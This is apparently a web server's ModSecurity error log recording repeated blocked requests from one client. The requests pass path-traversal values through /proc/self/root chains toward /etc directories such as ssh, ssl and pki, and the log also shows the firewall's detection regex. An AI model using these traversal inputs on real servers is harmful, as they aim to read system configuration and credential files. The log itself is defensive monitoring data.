[Mon Mar 16 18:11:42.490945 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:35330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyDrysWC90G-1nBrBhHgAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:44.955412 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:35336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyEP9ocpUE4ed4uDwP3QAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:46.255000 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:35352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyEqQpVkWug9HeOt9QJAAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:47.396039 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:35362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyE7ysWC90G-1nBrBhIQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:48.711632 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:55688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyFP9ocpUE4ed4uDwP4gAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:49.880428 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:55702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyFf9ocpUE4ed4uDwP5QAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:51.226363 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:55710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyF46lpbStxTqkSkuFRgAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:51.227199 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.228.16:33156] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhyF6TCbgAP5jq5TehH7wAAAsc"]
[Mon Mar 16 18:11:52.410437 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:55714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyGNSswJuvopo3lOh9CAAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:54.668930 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:55722] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyGc_BxrYCr4hPDw8GhwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:57.071022 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:55724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyHVajLEzk2WiQ-10urAAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:59.463616 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:43938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyH9SswJuvopo3lOh9DAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:00.784511 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:43950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyIM_BxrYCr4hPDw8GiAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:01.931352 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.241.46:43966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyIVajLEzk2WiQ-10urgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:03.205219 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:43978] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyI9SswJuvopo3lOh9DQAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:04.413078 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:43980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyJI6lpbStxTqkSkuFUAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:05.603597 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:43994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyJY6lpbStxTqkSkuFUgAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:06.932777 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.241.46:44010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyJqQpVkWug9HeOt9QKQAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:08.083080 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:56836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyKM_BxrYCr4hPDw8GjAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:09.481677 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:56844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyKaTCbgAP5jq5TehH8QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:10.735663 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:56848] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyKrABkC4fWIHEf8ET_wAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:12.026176 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:56850] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyLLysWC90G-1nBrBhJwAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
